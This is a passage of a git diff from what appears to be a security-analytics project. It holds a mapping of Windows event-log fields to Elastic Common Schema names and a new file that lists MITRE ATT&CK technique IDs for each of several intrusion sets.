"ecs":"winlog.event_data.ImagePath" + }, + { + "raw_field":"NewName", + "ecs":"winlog.event_data.NewName" + }, + { + "raw_field":"CallTrace", + "ecs":"winlog.event_data.CallTrace" + }, + { + "raw_field":"SamAccountName", + "ecs":"winlog.event_data.SamAccountName" + }, + { + "raw_field":"GrantedAccess", + "ecs":"winlog.event_data.GrantedAccess" + }, + { + "raw_field":"EngineVersion", + "ecs":"winlog.event_data.EngineVersion" + }, + { + "raw_field":"OriginalName", + "ecs":"winlog.event_data.OriginalName" + }, + { + "raw_field":"AuditSourceName", + "ecs":"winlog.event_data.AuditSourceName" + }, + { + "raw_field":"sha1", + "ecs":"hash.sha1" + }, + { + "raw_field":"SourceIp", + "ecs":"source.ip" + }, + { + "raw_field":"Payload", + "ecs":"winlog.event_data.Payload" + }, + { + "raw_field":"Level", + "ecs":"winlog.event_data.Level" + }, + { + "raw_field":"Application", + "ecs":"winlog.event_data.Application" + }, + { + "raw_field":"RemoteAddress", + "ecs":"winlog.event_data.RemoteAddress" + }, + { + "raw_field":"SearchFilter", + "ecs":"winlog.event_data.SearchFilter" + }, + { + "raw_field":"ApplicationPath", + "ecs":"winlog.event_data.ApplicationPath" + }, + { + "raw_field":"TargetFilename", + "ecs":"winlog.event_data.TargetFilename" + }, + { + "raw_field":"CurrentDirectory", + "ecs":"winlog.event_data.CurrentDirectory" + }, + { + "raw_field":"ObjectType", + "ecs":"winlog.event_data.ObjectType" + }, + { + "raw_field":"ServicePrincipalNames", + "ecs":"winlog.event_data.ServicePrincipalNames" + }, + { + "raw_field":"TemplateContent", + "ecs":"winlog.event_data.TemplateContent" + }, + { + "raw_field":"QueryResults", + "ecs":"winlog.event_data.QueryResults" + }, + { + "raw_field":"ServiceStartType", + "ecs":"winlog.event_data.ServiceStartType" + }, + { + "raw_field":"EventType", + "ecs":"winlog.event_data.EventType" + }, + { + "raw_field":"TargetSid", + "ecs":"winlog.event_data.TargetSid" + }, + { + "raw_field":"ParentUser", + "ecs":"winlog.event_data.ParentUser" + }, + { + "raw_field":"NewTargetUserName", + "ecs":"winlog.event_data.NewTargetUserName" + }, + { + "raw_field":"DestAddress", + "ecs":"winlog.event_data.DestAddress" + }, + { + "raw_field":"ContextInfo", + "ecs":"winlog.event_data.ContextInfo" + }, + { + "raw_field":"HostName", + "ecs":"host.name" + }, + { + "raw_field":"NewTemplateContent", + "ecs":"winlog.event_data.NewTemplateContent" + }, + { + "raw_field":"LayerRTID", + "ecs":"winlog.event_data.LayerRTID" + }, + { + "raw_field":"ImageFileName", + "ecs":"winlog.event_data.ImageFileName" + }, + { + "raw_field":"StartFunction", + "ecs":"winlog.event_data.StartFunction" + }, + { + "raw_field":"Value", + "ecs":"winlog.event_data.Value" + }, + { + "raw_field":"ModifyingApplication", + "ecs":"winlog.event_data.ModifyingApplication" + }, + { + "raw_field":"Destination", + "ecs":"winlog.event_data.Destination" + }, + { + "raw_field":"Commandline", + "ecs":"winlog.event_data.Commandline" + }, + { + "raw_field":"Message", + "ecs":"winlog.event_data.Message" + }, + { + "raw_field":"ShareName", + "ecs":"winlog.event_data.ShareName" + }, + { + "raw_field":"SourcePort", + "ecs":"source.port" + }, + { + "raw_field":"CallerProcessName", + "ecs":"winlog.event_data.CallerProcessName" + }, + { + "raw_field":"ServiceFileName", + "ecs":"winlog.event_data.ServiceFileName" + }, + { + "raw_field":"DestinationIsIpv6", + "ecs":"winlog.event_data.DestinationIsIpv6" + }, + { + "raw_field":"TargetImage", + "ecs":"winlog.event_data.TargetImage" + }, + { + "raw_field":"SourceAddress", + "ecs":"source.ip" + }, + { + "raw_field":"TargetObject", + "ecs":"winlog.event_data.TargetObject" + }, + { + "raw_field":"Caption", + "ecs":"winlog.event_data.Caption" + }, + { + "raw_field":"LocalName", + "ecs":"winlog.event_data.LocalName" + }, + { + "raw_field":"ImageLoaded", + "ecs":"winlog.event_data.ImageLoaded" + }, + { + "raw_field":"EventID", + "ecs":"winlog.event_id" + }, + { + "raw_field":"sha256", + "ecs":"hash.sha256" + }, + { + "raw_field":"ScriptBlockLogging", + "ecs":"winlog.event_data.ScriptBlockLogging" + }, + { + "raw_field":"SourceParentImage", + "ecs":"winlog.event_data.SourceParentImage" + }, + { + "raw_field":"SourceFilename", + "ecs":"winlog.event_data.SourceFilename" + }, + { + "raw_field":"Protocol", + "ecs":"winlog.event_data.Protocol" + }, + { + "raw_field":"ValidatedPolicy", + "ecs":"winlog.event_data.ValidatedPolicy" + }, + { + "raw_field":"ProcessPath", + "ecs":"winlog.event_data.ProcessPath" + }, + { + "raw_field":"OldValue", + "ecs":"winlog.event_data.OldValue" + }, + { + "raw_field":"ParentProcessId", + "ecs":"winlog.event_data.ParentProcessId" + }, + { + "raw_field":"TaskContentNew", + "ecs":"winlog.event_data.TaskContentNew" + }, + { + "raw_field":"Name", + "ecs":"winlog.event_data.Name" + }, + { + "raw_field":"payload", + "ecs":"winlog.event_data.payload" + }, + { + "raw_field":"SourceHostname", + "ecs":"winlog.event_data.SourceHostname" + }, + { + "raw_field":"ClientProcessId", + "ecs":"winlog.event_data.ClientProcessId" + }, + { + "raw_field":"TargetParentImage", + "ecs":"winlog.event_data.TargetParentImage" + }, + { + "raw_field":"ImpersonationLevel", + "ecs":"winlog.event_data.ImpersonationLevel" + }, + { + "raw_field":"ExceptionCode", + "ecs":"winlog.event_data.ExceptionCode" + }, + { + "raw_field":"FilterOrigin", + "ecs":"winlog.event_data.FilterOrigin" + }, + { + "raw_field":"PackagePath", + "ecs":"winlog.event_data.PackagePath" + }, + { + "raw_field":"SignatureStatus", + "ecs":"winlog.event_data.SignatureStatus" + }, + { + "raw_field":"Hash", + "ecs":"winlog.event_data.Hash" + }, + { + "raw_field":"AppID", + "ecs":"winlog.event_data.AppID" + }, + { + "raw_field":"SidList", + "ecs":"winlog.event_data.SidList" + }, + { + "raw_field":"ProcessNameBuffer", + "ecs":"winlog.event_data.ProcessNameBuffer" + }, + { + "raw_field":"PreviousCreationUtcTime", + "ecs":"winlog.event_data.PreviousCreationUtcTime" + }, + { + "raw_field":"Contents", + "ecs":"winlog.event_data.Contents" + }, + { + "raw_field":"TargetOutboundUserName", + "ecs":"winlog.event_data.TargetOutboundUserName" + }, + { + "raw_field":"ImageName", + "ecs":"winlog.event_data.ImageName" + }, + { + "raw_field":"md5", + "ecs":"hash.md5" + }, + { + "raw_field":"DeviceName", + "ecs":"winlog.event_data.DeviceName" + }, + { + "raw_field":"RequestedPolicy", + "ecs":"winlog.event_data.RequestedPolicy" + }, + { + "raw_field":"FileNameBuffer", + "ecs":"winlog.event_data.FileNameBuffer" + }, + { + "raw_field":"TaskContent", + "ecs":"winlog.event_data.TaskContent" + }, + { + "raw_field":"SourceCommandLine", + "ecs":"winlog.event_data.SourceCommandLine" + }, + { + "raw_field":"CreationUtcTime", + "ecs":"winlog.event_data.CreationUtcTime" + }, + { + "raw_field":"AppName", + "ecs":"winlog.event_data.AppName" + }, + { + "raw_field":"subjectName", + "ecs":"winlog.event_data.subjectName" + }, + { + "raw_field":"process", + "ecs":"winlog.event_data.process" + }, + { + "raw_field":"PackageFullName", + "ecs":"winlog.event_data.PackageFullName" + }, + { + "raw_field":"SourceName", + "ecs":"winlog.event_data.SourceName" + }, + { + "raw_field":"Data", + "ecs":"winlog.event_data.Data" + }, + { + "raw_field":"param3", + "ecs":"winlog.event_data.param3" + }, + { + "raw_field":"Signature", + "ecs":"winlog.event_data.Signature" + } + ] +} diff --git a/bin/main/correlations/mitre_correlation.json b/bin/main/correlations/mitre_correlation.json new file mode 100644 index 000000000..5bf7376fd --- /dev/null +++ b/bin/main/correlations/mitre_correlation.json @@ -0,0 +1,9625 @@ +{ + "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f": [ + { + "mitreAttackId": "attack.t1021.005" + }, + { + "mitreAttackId": "attack.t1021.004" + } + ], + "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c": [ + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1020" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1558.001" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1036.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1213.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1078.004" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1614.001" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e": [ + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1056.001" + } + ], + "intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710": [ + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1614" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1598.002" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1027.004" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1559.001" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1104" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1137.001" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1218.003" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.005" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1584.004" + }, + { + "mitreAttackId": "attack.t1134.002" + }, + { + "mitreAttackId": "attack.t1485" + }, + { + "mitreAttackId": "attack.t1529" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1008" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1489" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1591" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1497.001" + }, + { + "mitreAttackId": "attack.t1614.001" + }, + { + "mitreAttackId": "attack.t1608.002" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1070" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1574.013" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1026" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1588.004" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1588.003" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1010" + }, + { + "mitreAttackId": "attack.t1098" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1027.007" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1560.002" + }, + { + "mitreAttackId": "attack.t1534" + }, + { + "mitreAttackId": "attack.t1560.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1202" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1001.003" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1591.004" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1583.004" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1036.003" + }, + { + "mitreAttackId": "attack.t1557.001" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1070.003" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1593.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1620" + }, + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1220" + }, + { + "mitreAttackId": "attack.t1491.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1104" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1561.001" + }, + { + "mitreAttackId": "attack.t1561.002" + }, + { + "mitreAttackId": "attack.t1547.009" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1218" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1542.003" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1218.011" + } + ], + "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1125" + }, + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1486" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1071.004" + }, + { + "mitreAttackId": "attack.t1008" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1546.011" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1021.005" + }, + { + "mitreAttackId": "attack.t1497.002" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1558.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1091" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c": [ + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1020" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1598.002" + } + ], + "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3": [ + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1589" + }, + { + "mitreAttackId": "attack.t1591.004" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1583.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1010" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1518" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1069.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1534" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1016.001" + } + ], + "intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c": [ + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1123" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1529" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1561.002" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1036.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1094" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8": [ + { + "mitreAttackId": "attack.t1590.005" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1592.002" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--01e28736-2ffc-455b-9880-ed4d1407ae07": [ + { + "mitreAttackId": "attack.t1584.004" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1136" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1486" + }, + { + "mitreAttackId": "attack.t1484.001" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1489" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f": [ + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1040" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1552.006" + }, + { + "mitreAttackId": "attack.t1078" 